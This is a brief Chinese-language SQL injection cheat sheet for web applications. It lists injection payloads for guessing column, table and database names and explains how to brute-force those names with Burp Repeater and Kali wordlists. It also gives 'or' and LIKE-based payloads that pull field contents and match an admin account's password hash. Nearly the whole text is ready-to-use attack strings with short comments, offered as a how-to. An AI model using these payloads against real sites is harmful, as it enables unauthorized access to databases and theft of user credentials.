1. 列名、表名、库名
' and user is null--+
' and table.user is null--+
' and db.table.user is null--+
用burp截获http GET请求,发送到repeater,变量加$, load字典(字典可从kali中获取(find / -name *column*.txt))
' and (select count(*) from table)>0--+ //猜数据库里其它的表
2. 字段内容
' or user = 'admin+ //user字段,user是通过猜列名得到的正确结果
' or user like '%a% //构造SQL模糊查询语句
3. 猜账号对应密码
' or user='admin' and password='MD5值